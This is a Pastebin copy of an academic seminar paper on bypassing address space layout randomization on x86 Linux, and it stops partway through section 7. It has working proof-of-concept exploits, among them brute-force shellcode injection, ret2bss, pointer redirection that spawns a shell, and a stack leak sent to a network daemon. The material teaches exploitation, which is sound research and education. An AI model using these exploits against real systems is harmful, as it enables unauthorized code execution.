xdxdxd123

ASLR Smack & laugh reference

May 22nd, 2017
147
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 73.31 KB | None | 0 0
  1. ASLR Smack & Laugh Reference
  2. Seminar on Advanced Exploitation Techniques
  3. Tilo Müller
  4. RWTH Aachen, Germany
  5. Chair of Computer Science 4
  6. February 17, 2008
  7. Address space layout randomization (ASLR) is a
  8. security technology to prevent exploitations of buffer
  9. overflows. But this technology is far from perfect.
  10. ”[...] its only up to the creativity of the attacker what
  11. he does. So it raises the bar for us all :) but just might
  12. make writing exploits an interesting business again.”
  13. ([Dul00] about ASLR). This paper is an introduction
  14. and a reference about this business.
  15. Keywords: ASLR, Address Space Layout Random-
  16. ization, Exploitation
  17. 1 Introduction
  18. Address space layout randomization makes it more dif-
  19. ficult to exploit existing vulnerabilities, instead of in-
  20. creasing security by removing them. Thus ASLR is not
  21. a replacement for insecure code, but it can offer protec-
  22. tion from vulnerabilities that have not been fixed and
  23. even not been published yet. The aim of ASLR is to
  24. introduce randomness into the address space of a pro-
  25. cess. This lets a lot of common exploits fail by crashing
  26. the process with a high probability instead of executing
  27. malicious code.
  28. There are a lot of other prophylactic security tech-
  29. nologies besides ASLR, like StackGuard, StackShield
  30. or Libsafe. But only ASLR is implemented and en-
  31. abled by default into important operating systems.
  32. ASLR is implemented in Linux since kernel 2.6.12,
  33. which has been published in June 2005. Microsoft
  34. implemented ASLR in Windows Vista Beta 2, which
  35. has been published in June 2006. The final Win-
  36. dows Vista release has ASLR enabled by default, too
  37. - although only for executables which are specifically
  38. linked to be ASLR enabled. Further operating systems
  39. like OpenBSD enabled ASLR as well. So it is essential
  40. for an attacker to deal with ASLR nowadays.
  41. Originally ASLR was part of the Page EXec (PaX)
  42. project - a comprehensive security patch for the Linux
  43. kernel. PaX has already been available in 2000 -
  44. years before kernel 2.6.12. There have also been third
  45. party implementations of ASLR for previous versions
  46. of Windows. So the idea and even the implementation
  47. of address space randomization is not as new as it may
  48. appear.
  49. Nevertheless and unlike common exploitation tech-
  50. niques there are barely useful informations about ad-
  51. vanced techniques to bypass the protection of ASLR.
  52. This paper tries to bring together some of the scarce
  53. informations out there.
  54. First, I briefly want to show how ASLR works and
  55. why a lot of common exploitation techniques fail in its
  56. presence. Afterwards I demonstrate mechanisms to by-
  57. pass the protection of ASLR. The vulnerabilities and
  58. their exploits are getting more difficult in the course of
  59. this paper. First I describe two aggressive aproaches:
  60. Brute force and denial of service. Then I explain how
  61. to return into non-randomized memory areas, how to
  62. bypass ASLR by redirecting pointers and how to get a
  63. system to divulge critical stack information. After this
  64. I explain some advanced techniques like the stack jug-
  65. gling methods, GOT hijacking, off by ones and over-
  66. writing the .dtors section before I come to a conclu-
  67. sion. What I show is that systems with ASLR enabled
  68. are still highly vulnerable against memory manipula-
  69. tion attacks. Some of the exploitation techniques de-
  70. scribed in this paper are also useful to bypass another
  71. popular security technology: The nonexecutable stack.
  72. This paper is assisted by proof of concept codes,
  73. which are based on a Debian Etch installation without
  74. any additional security patches. It is a x86 system with
  75. 1
  76. kernel 2.6.23, glibc 2.6.1 and gcc 4.2.3. To minimize
  77. these samples, a exemplary shellcode can be found in
  78. the appendix and outputs are shortened.
  79. Before you go on, I want to aver, that it is recom-
  80. mended to have basic knowledge in buffer overflows
  81. and format string vulnerabilities. You may want to read
  82. [One96] and [Scu01] first.
  83. [cor05], [Whi07], [PaX03], [Kle04]
  84. 2 The functioning of ASLR
  85. How does address space layout randomization work?
  86. Common exploitation techniques overwrite return ad-
  87. dresses by hard coded pointers to malicious code. With
  88. ASLR the predictability of memory addresses is re-
  89. ducedbyrandomizingtheaddressspacelayoutforeach
  90. instantiation of a program. So the job of ASLR is to
  91. prevent exploits by moving process entry points to ran-
  92. dom locations, because this decreases the probability
  93. that an individual exploit will succeed.
  94. unsigned long getEBP ( void ) {
  95. asm ( ”movl %ebp,%eax” );
  96. }
  97. int main ( void ) {
  98. printf ( ”EBP:%x\n” ,getEBP ( ) ) ;
  99. }
  100. Figure 1: getEBP.c
  101. ConsiderthelittleCprogrammgetEBPforinstance
  102. (see figure 1). The contents of the EBP register should
  103. be compared on the basis of this code - with and with-
  104. out ASLR. The EBP register is a pointer to the stack
  105. and so it contains a stack address. We are interested in
  106. the value of such stack addresses, because they are ran-
  107. domized by ASLR. Alternatively one could compare
  108. the content of the ESP register or any other pointer to a
  109. stack address. Not only the content of the EBP register
  110. is randomized but also the remaining stack addresses.
  111. ASLR can be disabled at boottime passing the
  112. norandmaps parameter or at runtime via echo 0 >
  113. /proc/sys/kernel/randomize_va_space.
  114. Executing getEBP twice while ASLR is disabled
  115. results in:
  116. > ./getEBP
  117. EBP:bffff3b8
  118. > ./getEBP
  119. EBP:bffff3b8
  120. The output probably looks like you have expected it:
  121. The EBP register points to the same address location
  122. on every instantiation of getEBP. But enabling ASLR
  123. results in e.g.:
  124. > ./getEBP
  125. EBP:bfaa2e58
  126. > ./getEBP
  127. EBP:bf9114c8
  128. This is the result of ASLR: The EBP register points to
  129. a randomized address; 24 bits of the 32-bit address are
  130. randomized.
  131. TheexampleillustratesthatASLRpreventsattackers
  132. from using exploits with hard coded return addresses.
  133. This kind of exploits have been the most common ones
  134. for years. With ASLR manipulating an instruction
  135. pointer would most likely crash the vulnerable task by
  136. a segmentation fault in, because it is impossible to give
  137. a precise predication of a certain address, especially a
  138. return address. A ret2libc attack (cf. [c0n06a]) would
  139. also crashthe process, since librariesare randomized as
  140. well (see figure 2). Such a crash allows denial of ser-
  141. vice attacks on the one hand, but an easy detection of
  142. failed exploitation attempts on the other hand. There-
  143. fore it is wise to use a crash detection and reaction sys-
  144. tem together with ASLR. A simple denial of service
  145. attack is often not the target of the attacker.
  146. cat / proc / self / maps | egrep ’ ( libc | heap | stack ) ’
  147. 0804d000−0806e000 [ heap ]
  148. b7de4000−b7f26000 / lib / i686 /cmov/ libc −2.6.1. so
  149. b7f26000−b7f27000 / lib / i686 /cmov/ libc −2.6.1. so
  150. b7f27000−b7f29000 / lib / i686 /cmov/ libc −2.6.1. so
  151. bf873000−bf888000 [ stack ]
  152. cat / proc / self / maps | egrep ’ ( libc | heap | stack ) ’
  153. 0804d000−0806e000 [ heap ]
  154. b7dde000−b7f20000 / lib / i686 /cmov/ libc −2.6.1. so
  155. b7f20000−b7f21000 / lib / i686 /cmov/ libc −2.6.1. so
  156. b7f21000−b7f23000 / lib / i686 /cmov/ libc −2.6.1. so
  157. bf9b3000−bf9c8000 [ stack ]
  158. Figure 2: /proc/self/maps
  159. Furthermore figure 2 points out that the stack and
  160. the libraries are randomized, but not the heap. The
  161. text, data and bss area of the process memory are not
  162. being randomized as well. This behavior does not
  163. accord to the original functionality which was pro-
  164. vided by the PaX project. The original ASLR of the
  165. PaX project contained RANDEXEC, RANDMMAP,
  166. RANDUSTACK and RANDKSTACK. According to
  167. the documentation of the PaX project (cf. [PaX03]) the
  168. job of these component is to randomize the following:
  169. 2
  170. RANDEXEC/RANDMMAP - code/data/bss
  171. segments
  172. RANDEXEC/RANDMMAP - heap
  173. RANDMMAP - libraries, heap
  174. thread stacks
  175. shared memory
  176. RANDUSTACK - user stack
  177. RANDKSTACK - kernel stack
  178. It seems that not all of these components are fully im-
  179. plemented to the current linux kernel. This fact takes
  180. us to the one class of ASLR resistant exploits: Return
  181. into non-randomized areas. But there are several ways
  182. for an attacker to deal with the ignorance of the address
  183. space layout. We will discuss them in the following
  184. sections beginning with aggressive approaches.
  185. [PaX03], [Sha04], [Kle04]
  186. 3 Aggression
  187. 3.1 Brute force
  188. ASLR increases the consumption of the system’s en-
  189. tropy pool since every task creation requires some bits
  190. of randomness (cf. [PaX03]). Among others the se-
  191. curity is based on how predictable the random address
  192. space layout of a program is.
  193. There are a lot of very detailed expositions about this
  194. topic. [Whi07] for instance, comes to the following
  195. result regarding Windows: The protection offered by
  196. ASLR under Windows Vista may not be as robust as
  197. expected.
  198. The success of pure brute force is heavily based on
  199. how tolerant an exploit is to variations in the address
  200. space layout, e.g. how many NOPs can be placed in the
  201. buffer. Furthermore it is based on how many exploita-
  202. tion attempts an attacker can perform and how fast he
  203. can perform them. It is necessary that a task can be
  204. restartet after a crash. But this is not as improbably as
  205. itsounds, becausealotnetworkserversrestarttheirser-
  206. vices upon crashing. [Sha04] for instance, shows how
  207. to compromise an Apache web server by brute force
  208. over network.
  209. In chapter 2 I have mentioned that only 24 bits are
  210. randomized on a 32-bit architecture. But on a 64-bit
  211. architecture there are more bits to randomize. Since
  212. every bit doubles the number of possible stack lay-
  213. outs, most of the working brute force exploits for a x86
  214. architecture will not succeed on a x64 machine. Ac-
  215. cording to [Sha04] the most promising solution against
  216. brute force is to upgrade to a 64-bit architecture.
  217. void function ( char ∗args ) {
  218. char buff [4096];
  219. strcpy ( buff , args );
  220. }
  221. int main ( int argc , char∗ argv [ ] ) {
  222. function ( argv [ 1 ] ) ;
  223. return 0;
  224. }
  225. Figure 3: bruteforce.c
  226. Consider the C programm bruteforce for in-
  227. stance (see figure 3). This code contains a classic
  228. strcpy vulnerability (cf. [One96]). There is a buffer
  229. of 4096 bytes we want to use for placing malicious
  230. code and some NOPs (- it would even be possible to
  231. place more code and NOPs above this buffer for sure).
  232. Without ASLR it would be an ease to determine the ap-
  233. proximate return address using gdb, to manipulate the
  234. RIP register by a buffer overflow and to run the shell-
  235. code. But under ASLR it makes no sense to determine
  236. any stack address and it is necessary to guess one. The
  237. chance is about one to 2 24 /4096 = 4096 to hit a work-
  238. ing return address, so an exploit requires 2048 attempts
  239. on the average.
  240. You can find an exploit for bruteforce in figure
  241. 4 and 5. It takes about five minutes on a 1.5 GHz CPU
  242. to get the exploit working. Finally a shell opens up:
  243. > ./bfexploit.sh
  244. ./bfexploit.sh: line 9: Segfault
  245. [...]
  246. ./bfexploit.sh: line 9: Segfault
  247. sh-3.1$ echo yipieh!
  248. yipieh!
  249. 3.2 Denial of service
  250. There are two possibilities: One approach is to induce
  251. a denial of service by simply overflowing a buffer. The
  252. success of such a denial of service attack is indepen-
  253. dent of the protection that is given by ASLR. By now it
  254. should be clear how to use buffer overflows for such a
  255. simple attack. For a proof of concept you can draw on
  256. figure 3: Pass a 6000 byte parameter of nonsense and
  257. the program will crash with a segmentation fault, be-
  258. cause the return address is overwritten with an invalid
  259. value.
  260. Furthermore it is possible to use format string
  261. vulnerabilities to cause a denial of service. This
  262. approach is even independent of the protection of
  263. 3
  264. #define NOP 0x90
  265. int main ( int argc , char∗ argv [ ] ) {
  266. char ∗buff , ∗ ptr ;
  267. long ∗adr ptr , adr ;
  268. int i ;
  269. int bgr = atoi ( argv [1])+8;
  270. int offset = atoi ( argv [ 2 ] ) ;
  271. buff = malloc ( bgr );
  272. adr = 0xbf010101 + offset ;
  273. for ( i =0; i<bgr ; i ++)
  274. buff [ i ] = NOP;
  275. ptr = buff+bgr −8;
  276. adr ptr = ( long ∗) ptr ;
  277. for ( i =0; i <8; i +=4)
  278. ∗( adr ptr ++) = adr ;
  279. ptr = buff+bgr−8−strlen ( shellcode );
  280. for ( i =0; i<strlen ( shellcode ); i ++)
  281. ∗( ptr ++) = shellcode [ i ];
  282. buff [ bgr ] = ’\0 ’ ;
  283. puts ( buff );
  284. return 0;
  285. }
  286. Figure 4: bfexploit.c
  287. # !/ bin / sh
  288. while [ 0 ]; do
  289. . / bruteforce ‘./ bfexploit 4096 $i ‘
  290. i=$ (( $i + 2048))
  291. if [ $i −gt 16777216 ]; then
  292. i =0
  293. fi
  294. done ;
  295. Figure 5: bfexploit.sh
  296. ASLR. Format string vulnerabilities occur when a
  297. lazy programmer types printf(str) instead of
  298. printf("%s",str). More often than not the out-
  299. put is the same and so the mistake keeps a low profile.
  300. Since the real format string is missing the str param-
  301. eter is interpreted as format string instead. This pro-
  302. vides a security leak if an attacker has influence to the
  303. content of str. E.g. passing the format instruction %x
  304. several times affords the possibility to readout the stack
  305. contents, because printf still assumes that the stack
  306. contains the correct number of arguments. printf
  307. just reads the stack contents following on the format
  308. string pointer, even if these contents were not designed
  309. to be an argument. Details about format string vulner-
  310. abilities can be found in [Scu01].
  311. A process would crash if the printf function inter-
  312. pretsanargumentasstringpointer, thoughthismemory
  313. locationcannotbeusedasapointer, becauseitpointsto
  314. unaccessible memory. So passing a format string that
  315. contains the format instruction %s can cause a segmen-
  316. tation fault.
  317. Consider the little C program listed in figure 6. It
  318. contains a single vulnerable printf call.
  319. int main ( int argc , char ∗∗argv ) {
  320. printf ( argv [ 1 ] ) ;
  321. }
  322. Figure 6: formatStringDos.c
  323. Small numbers like 0, 1 or 2 are examples for invalid
  324. pointers. Each attempt to resolve them ends in a seg-
  325. mentation fault. So a denial of service can be caused by
  326. letting the format instruction %s try to resolve such an
  327. invalid pointer. Using gdb shows where printf ex-
  328. pects its parameters and where to find small numbers:
  329. (gdb) run %x_%x_%x_%x_%x_%x_%x_%x
  330. Breakpoint 1
  331. (gdb) x/9x $esp
  332. 0xb7f8eb70 0xbf900190 0xbf9001e8
  333. 0xb7e39050 0xb7f9cce0 0x080483b0
  334. 0xbf9001e8 0xb7e39050 0x00000002
  335. (gdb) continue
  336. bf900190_bf9001e8_b7e39050_b7f9cce0
  337. _80483b0_bf9001e8_b7e39050_2
  338. Thus interpreting the eighth argument as string
  339. pointer would end in a segmentation fault, because this
  340. location contains 2, what is not a valid pointer:
  341. ./formatStringDos %8\$s
  342. Segmentation fault
  343. 4 Return into non-randomized
  344. memory
  345. In chapter 2 you have seen, that the stack is randomized
  346. by ASLR. But there are still some areas of the address
  347. space, that are not randomized: The heap, the bss, the
  348. data and the text segment. As a reminder I want to list
  349. the differences between these areas (corresponding to
  350. [Kle04]):
  351. • Stack: parameters and dynamic local variables
  352. • Heap: dynamically created data structures (mal-
  353. loc)
  354. • BSS: uninitialized global and uninitialized static
  355. local variables
  356. 4
  357. • Data: initialized global and initialized static local
  358. variables
  359. • Text: readonly program code
  360. 4.1 ret2text
  361. The text region is marked readonly and any attempt
  362. to write to it will result in a segmentation violation.
  363. Therefore it is not possible to place shellcode in this
  364. area. Though it is possible to manipulate the program
  365. flow: Overwriting the return address with another rea-
  366. sonable pointer to the text area affords jumping inside
  367. the original code.
  368. This kind of exploitation is interesting for code seg-
  369. ments which cannot be reached in normal program
  370. flows. Consider the C program ret2text (see figure
  371. 7). This program contains a classic strcpy vulnera-
  372. bility and a code segment that only root can execute.
  373. void public ( char∗ args ) {
  374. char buff [12];
  375. strcpy ( buff , args );
  376. printf ( ” public\n” );
  377. }
  378. void secret ( void ) {
  379. printf ( ” secret \n” );
  380. }
  381. int main ( int argc , char∗ argv [ ] ) {
  382. if ( getuid () == 0) secret ( ) ;
  383. else public ( argv [ 1 ] ) ;
  384. }
  385. Figure 7: ret2text.c
  386. Jumping into secret needs the address of this
  387. function which can be determined by gdb as follows:
  388. (gdb) print secret
  389. 1 = {void (void)} 0x80483fa <secret>
  390. Overflowing the buffer with this address provides a
  391. working exploit:
  392. > ./ret2text \
  393. > ‘perl -e ’print "A"x16; \
  394. > print "\xfa\x83\x04\x08"’‘
  395. public
  396. secret
  397. Segmentation fault
  398. The segmentation fault does not matter in most
  399. cases, since the secret code has already been executed.
  400. If a program does not contain secret code, which is
  401. interesting to execute, an attacker can try to chain up
  402. chunks of existing code to a useful shellcode. This
  403. borrowed code technique is described in [Kra05] using
  404. code fragments of libc to bypass a nonexecutable stack.
  405. Under ASLR an attacker cannot use code fragments of
  406. libc, since libraries are randomized. But what is still
  407. imaginable is to use code fragments of the vulnerable
  408. program itself. The possibilities to create useful shell-
  409. codes rise with the size of the program.
  410. The code fragments which can be used for this inten-
  411. tion are continuous assembler chunks up to a return in-
  412. struction. Thereturninstructionschainthecodechunks
  413. together. This works as follows: A buffer overflow has
  414. to be used to overwrite the return address by the start
  415. address of the first code chunk. This code chunk will be
  416. executed till the program flow reaches its closing return
  417. instruction. After that the next return address is read
  418. from the stack, which is ideally the start address of the
  419. second code chunk. So the start address of the second
  420. code chunk has to be placed right above the start ad-
  421. dress of the first code chunk. The second chunk is also
  422. executed till its closing return instruction is reached.
  423. Then the start address of the third chunk is read from
  424. the stack and so on.
  425. 4.2 ret2bss
  426. The bss area contains all uninitialized global and unini-
  427. tialized static local variables. It is writable and there-
  428. fore global variables are potential locations for placing
  429. malicious code. Furthermore this area is not random-
  430. ized by ASLR and it is feasible to determine fixed ad-
  431. dresses.
  432. That sounds great, but there is one problem: A clas-
  433. sic stack overflow is still necessary, because the return
  434. addresses are saved on the stack - not in the bss area.
  435. Hence two inputs are needed: One to overflow a buffer
  436. and one to infiltrate the bss area with shellcode.
  437. char globalbuf [256];
  438. void function ( char∗ input ) {
  439. char localbuf [256];
  440. strcpy ( localbuf , input );
  441. strcpy ( globalbuf , localbuf );
  442. }
  443. int main ( int argc , char∗∗ argv ) {
  444. function ( argv [ 1 ] ) ;
  445. }
  446. Figure 8: ret2bss.c
  447. It is possible to avoid two inputs if there is one input
  448. which is stored on the stack and the bss area. Consider
  449. 5
  450. the C program ret2bss (see figure 8). The input is
  451. stored in localbuf, which let an attacker overflow
  452. the buffer, and it is stored in globalbuf, which let
  453. an attacker place his shellcode.
  454. The address of the infiltrated code can be determined
  455. by using gdb as follows:
  456. (gdb) print &globalbuf
  457. 2 = (char ( * )[256]) 0x80495e0
  458. A possibe exploit can be found in figure 9. Passing
  459. the output of this exploit into the input of ret2bss
  460. opens up a shell:
  461. > ./ret2bss ‘./ret2bssexploit‘
  462. sh-3.1$ echo ay caramba!
  463. ay caramba!
  464. sh-3.1$
  465. int main ( void ) {
  466. char ∗buff , ∗ ptr ;
  467. long ∗ adr ptr ;
  468. int i ;
  469. buff = malloc (264);
  470. ptr = buff ;
  471. for ( i =0; i <264; i ++)
  472. ∗( ptr ++) = ’A’ ;
  473. ptr = buff +264−8;
  474. adr ptr = ( long ∗) ptr ;
  475. for ( i =0; i <8; i +=4)
  476. ∗( adr ptr ++) = 0x080495e0 ;
  477. ptr = buff ;
  478. for ( i =0; i<strlen ( shellcode ); i ++)
  479. ∗( ptr ++) = shellcode [ i ];
  480. buff [264] = ’\x00 ’ ;
  481. printf ( ”%s” , buff );
  482. }
  483. Figure 9: ret2bssexploit.c
  484. 4.3 ret2data
  485. The data area contains all initialized global and initial-
  486. ized static local variables. Thus, the only difference to
  487. the bss area is that the variables are initialized here. A
  488. return into the data area is possible analog to a return
  489. into the bss area.
  490. 4.4 ret2heap
  491. The heap contains all dynamically created data struc-
  492. tures, i.e. all variables which get their memory as-
  493. signed by malloc. Also the heap is not randomized
  494. by ASLR and a return into the heap is possible - very
  495. similar to ret2bss again. Just place the shellcode in a
  496. dynamically created data structure instead of a global
  497. variable.
  498. Further I want to mention that a return into the heap
  499. has absolutely nothing to do with a heap overflow (as
  500. known from [Con99]). A ret2heap requires the heap
  501. because of its fixed addresses - it does not change the
  502. structure of the heap.
  503. The heap overflow technique described in [Con99]
  504. does not work anymore. But this does not come from
  505. ASLR, it is because of the heap implementation has
  506. been updated.
  507. 5 Pointer redirecting
  508. This section describes how to redirect pointers that
  509. have been declared by the programmer - not how to
  510. redirect internal pointers. These pointers can be string
  511. pointers or even function pointers.
  512. 5.1 String pointers
  513. Hardcoded strings are not pushed upon the stack, but
  514. saved within non-randomized areas. Therefore it is rel-
  515. ativelyeasytoredirectastringpointertoanotherstring.
  516. The idea of redirecting string pointers is not to manip-
  517. ulate the output, but rather to manipulate the arguments
  518. of critical functions like system or execv.
  519. int main ( int argc , char∗ args [ ] ) {
  520. char input [256];
  521. char ∗conf = ” t e s t −f ˜ / . progrc ” ;
  522. char ∗ license = ”THIS SOFTWARE IS . . . ” ;
  523. printf ( license );
  524. strcpy ( input , args [ 1 ] ) ;
  525. if ( system ( conf )) printf ( ” Missing . progrc ” );
  526. }
  527. Figure 10: strptr.c
  528. Consider the vulnerable program strptr in fig-
  529. ure 10. This program contains two hardcoded strings:
  530. conf and license. The license is just designed for
  531. output; conf is designed to be executed as shell com-
  532. mand. Assume an attacker can conf let point to the
  533. license string. What would be executed in the if state-
  534. ment is:
  535. system("THIS SOFTWARE IS...\n");
  536. system tries to execute THIS and treats the re-
  537. maining string as parameters for THIS. An executable
  538. file called THIS cannot be found on a normal Unix
  539. system, but can and should be created by an attacker.
  540. 6
  541. An attacker can write an arbitrary binary or script
  542. called THIS that will be executed with the privileges
  543. of strptr. It could contain /bin/sh for instance.
  544. Note, that this exploitation technique cannot be used
  545. remotely, since an executable file has to be created lo-
  546. cally and note that this executable file has to be acces-
  547. sible by the PATH environment.
  548. The string pointer conf can be overwritten since the
  549. programcontainsastrcpyvulnerability. Onecanuse
  550. gdb to readout the address of the license string:
  551. (gdb) print license
  552. 0x8048562 "THIS SOFTWARE IS...\n"
  553. So the conf pointer should be redirected to
  554. 08048562 hex . An exploit works as follows:
  555. > echo "/bin/sh" > THIS
  556. > chmod 777 THIS
  557. > PATH=.:$PATH
  558. > ./strptr ‘perl -e ’print "A"x256;\
  559. > print "\x62\x85\x04\x08"’‘
  560. THIS SOFTWARE IS...
  561. sh-3.1$
  562. 5.2 Function pointers
  563. Not only redirecting string pointers is useful, but also
  564. redirecting function pointers. Function pointers are
  565. widely used as virtual functions in C++. They are used
  566. to realize GUIs for instance or more critical to imple-
  567. ment SSL.
  568. void function ( char∗ s t r ) {
  569. printf ( ”%s\n” , s t r );
  570. system ( ”any command” );
  571. }
  572. int main ( int argc , char∗∗ argv ) {
  573. void (∗ ptr )( char∗ s t r );
  574. ptr = &function ;
  575. char buff [64];
  576. strcpy ( buff , argv [ 1 ] ) ;
  577. (∗ ptr )( argv [ 2 ] ) ;
  578. }
  579. Figure 11: funcptr.c
  580. Consider the example funcptr listed in figure 11.
  581. The program reads two user inputs. During a normal
  582. program flow ptr points to function and the last
  583. command of main leads to the output of argv[2].
  584. But if an attacker can overflow buff in a way that
  585. ptr points to system the second user argument will
  586. be executed. An attack would utilize the first argument
  587. to exploit the strcpy vulnerability and the second
  588. one to hand over the shell command. It simplifies the
  589. challenge when system is called somewhere (here in
  590. funcptr).
  591. The address of system can be determined by using
  592. the debugger as follows:
  593. (gdb) disass function
  594. <function+24>: call 0x8048328<system>
  595. Thus ptr have to be overwritten by 08048328 hex .
  596. What this address means in particular will be explained
  597. in section 9 during the explanation of GOT and PLT.
  598. Writing the exploit is straight forward and I go on with-
  599. out listing it.
  600. 6 Integer overflows
  601. ASLR does not avoid buffer overflows, it just makes
  602. them more difficult to exploit. The same holds for in-
  603. teger overflows: ASLR does not avoid them. Avoiding
  604. overflows is still in the hand of the programmer.
  605. Thus it is still profitable to look out for integer over-
  606. flows. But exploiting them has always been problem-
  607. atic - without ASLR and even more with ASLR. It can
  608. be an ease to induce a segmentation fault, but to exe-
  609. cute shellcode requires more than an integer overflow.
  610. A buffer overflow vulnerability has to arise, e.g. af-
  611. ter the size of the input could be faked up. Be content
  612. withsegmentationfaultsinthissection-howtoexecute
  613. your shellcode is already covered by other sections.
  614. More details about integer overflows can be found in
  615. [ble02].
  616. 6.1 Widthness overflows
  617. A widthness overflow is the result of storing a value
  618. into a data type that is too small to hold it. E.g. the type
  619. char can save exactly one byte: Values from −128 to
  620. +127. Larger or smaller numbers are truncated to their
  621. least siginificant byte: 256 becomes 0, 257 becomes 1
  622. etcetera.
  623. Consider figure 12. The programmer checks the size
  624. of the user input before copying it into the buffer. This
  625. should avoid overflows usually. But he decided to use
  626. char variables to store the sizes, since buff is small
  627. enough to do so. The result of his decision is that a
  628. buffer overflow can occur anyhow:
  629. > ./widthness ‘perl -e ’print "A"x256’
  630. Copy 0 byte
  631. Segmentation fault
  632. 7
  633. int main ( int argc , char ∗∗argv ) {
  634. char bsize = 64;
  635. char buff [ bsize ];
  636. char isize = strlen ( argv [ 1 ] ) ;
  637. if ( isize < bsize ) {
  638. printf ( ”Copy %i byte ” , isize , bsize );
  639. strcpy ( buff , argv [ 1 ] ) ;
  640. }
  641. else {
  642. printf ( ” Input out of size .\n” );
  643. }
  644. }
  645. Figure 12: withness.c
  646. A buffer overflow occurs, if the user input exceeds a
  647. sizeof127bytesandtheleastsignificantbyteissmaller
  648. than 64.
  649. Mind that a widthness overflow can occur not only
  650. during an assignment, but also during arithmetic oper-
  651. ations. E.g. increasing the integer ffffffff hex by
  652. one results in 0.
  653. 6.2 Signedness bugs
  654. Signedness bugs occur when an unsigned variable is
  655. interpreted as signed and vice versa. The problem is
  656. that a lot of predefined system functions like memcpy
  657. interprete the length parameter as unsigned int,
  658. whereas most programmers use int (what is equal to
  659. signed int).
  660. int main ( int argc , char ∗∗argv ) {
  661. char dest [1024];
  662. char src [1024];
  663. int cp = atoi ( argv [ 1 ] ) ;
  664. if ( cp <= 1024)
  665. memcpy( dest , src , cp );
  666. else
  667. printf ( ” Input out of range .\n” );
  668. }
  669. Figure 13: signedness.c
  670. Consider figure 13. The user can determine how
  671. many bytes from src should be copied to dest. Pass-
  672. ing a huge number that overflows the four byte range of
  673. cp does not work. But passing a negative number will
  674. lead to a buffer overflow, since a negative number is al-
  675. ways smaller than 1024 and memcpy interpretes it as
  676. unsigned integer (e.g. −1 as ffffffff hex ):
  677. > ./signedness -1
  678. Segmentation fault
  679. This type of vulnerability often occurs in network
  680. daemons, when length information is sent as part of the
  681. packet.
  682. 7 Stack divulging methods
  683. This approach of bypassing ASLR tries to discover in-
  684. formations about the random addresses. This makes
  685. senseintermsofdaemonsorotherpersistentprocesses,
  686. since the address space layout is only randomized by
  687. starting a process and not during its lifetime.
  688. There may be a few ways of getting this critical in-
  689. formation. I want to demonstrate two very different
  690. ways: The stack stethoscope (according to [Kot05b])
  691. and a simple form of exploiting format string vulnera-
  692. bilities.
  693. 7.1 Stack stethoscope
  694. The address of a process stack’s bottom can be detected
  695. by reading /proc/<pid>/stat. The 28th item of
  696. thestatfileistheaddressofthestack’sbottom. Upon
  697. this information the whole address space can be calcu-
  698. lated, due to the fact that offsets within the stack are
  699. constant. These offsets could be analyzed by gdb for
  700. one.
  701. Daemons or processes awaiting input interactively
  702. are exploitable by this technique, since an attacker has
  703. enough time to read /proc/<pid>/stat.
  704. The disadvantage of this approach is that it is abso-
  705. lutely necessary to have an access to the machine, i.e.
  706. it is a local exploit technique. The advantage of this
  707. technique is that ASLR is almost useless if one have
  708. this access, because the stat files are readable for ev-
  709. eryone by default:
  710. -r--r--r-- 1 root root 0 stat
  711. Consider the network daemon divulge (see figure
  712. 14). This daemon reads data from a client and sends it
  713. back. The strcpy vulnerability allows a buffer over-
  714. flow.
  715. To exploit this vulnerability an attacker has to detect
  716. the constant offset between the stack’s bottom and the
  717. beginning of writebuf, where the shellcode will be
  718. placed in. The offset can be determined by using gdb
  719. as follows:
  720. (gdb) list
  721. 16 sprintf(writebuf,readbuf);
  722. 17 write(connfd,writebuf,strlen(..));
  723. (gdb) break 17
  724. (gdb) run
  725. 8
  726. #define SA struct sockaddr
  727. int listenfd , connfd ;
  728. void function ( char∗ s t r ) {
  729. char readbuf [256];
  730. char writebuf [256];
  731. strcpy ( readbuf , s t r );
  732. sprintf ( writebuf , readbuf );
  733. write ( connfd , writebuf , strlen ( writebuf ) ) ;
  734. }
  735. int main ( int argc , char∗ argv [ ] ) {
  736. char line [1024];
  737. struct sockaddr in servaddr ;
  738. s s i z e t n ;
  739. l i s t e n f d =socket (AF INET ,SOCK STREAM, 0 ) ;
  740. bzero(&servaddr , sizeof ( servaddr ) ) ;
  741. servaddr . sin family = AF INET;
  742. servaddr . sin addr . s addr=htonl (INADDR ANY);
  743. servaddr . sin port = htons (7776);
  744. bind ( listenfd ,
  745. (SA∗)&servaddr , sizeof ( servaddr ) ) ;
  746. l i s t e n ( listenfd , 1024);
  747. for ( ; ; ) {
  748. connfd=accept ( listenfd , (SA∗)NULL,NULL);
  749. write ( connfd , ”> ” ,2);
  750. n = read ( connfd , line , sizeof ( line ) −1);
  751. line [n] = 0;
  752. function ( line );
  753. close ( connfd );
  754. }
  755. }
  756. Figure 14: divulge.c
  757. Breakpoint 1 at divulge.c:17
  758. (gdb) print &writebuf
  759. (char ( * )[256]) 0xbfe14858
  760. After setting the breakpoint and running divulge
  761. a connection to the server has to be established:
  762. echo AAAAA | nc localhost 7776.
  763. So the address of writebuf is bfe14858 hex . But
  764. the address of the stack’s bottom is still needed to cal-
  765. culate the offset. It can be detected by:
  766. > cat /proc/‘pidof divulge‘/stat\
  767. > | awk ’{ print $28 }’
  768. 3219214128$
  769. So the base address of the stack is 3219214128 dec =
  770. bfe14f30 hex . Now the offset can be calculated:
  771. bfe14f30 hex − bfe14858 hex = 6d8 hex = 1752 dec .
  772. You can find an exploit using this constant offset in
  773. figure 15. The exploit expects the address of the stack’s
  774. bottom as a parameter. If you start the exploit as seen
  775. below a shellcode will be executed server-sided:
  776. > ./divexploit ‘cat /proc/ \
  777. int main ( int argc , char∗∗ argv ) {
  778. char ∗buff , ∗ ptr ;
  779. long ∗ adr ptr ;
  780. int i ;
  781. unsigned long stackpointer
  782. = s t r t o u l ( argv [1] ,NULL,10) −1752;
  783. buff = malloc (265);
  784. ptr = buff ;
  785. adr ptr = ( long ∗) ptr ;
  786. for ( i =0; i <264; i +=4)
  787. ∗( adr ptr ++) = stackpointer ;
  788. ptr = buff ;
  789. for ( i =0; i<strlen ( shellcode ); i ++)
  790. ∗( ptr ++) = shellcode [ i ];
  791. buff [264] = ’\0 ’ ;
  792. printf ( ”%s” , buff );
  793. }
  794. Figure 15: divexploit.c
  795. > $(pidof divulge)/stat \
  796. > | awk ’{ print $28}’‘ \
  797. > | nc localhost 7776
  798. 7.2 Formatted information
  799. As shown in section 3 format string vulnerabilities can
  800. cause a denial of service. Section 11 will show that for-
  801. mat string vulnerabilities even can be used to execute
  802. shellcode. ButunderASLRitalsomakessensetobring
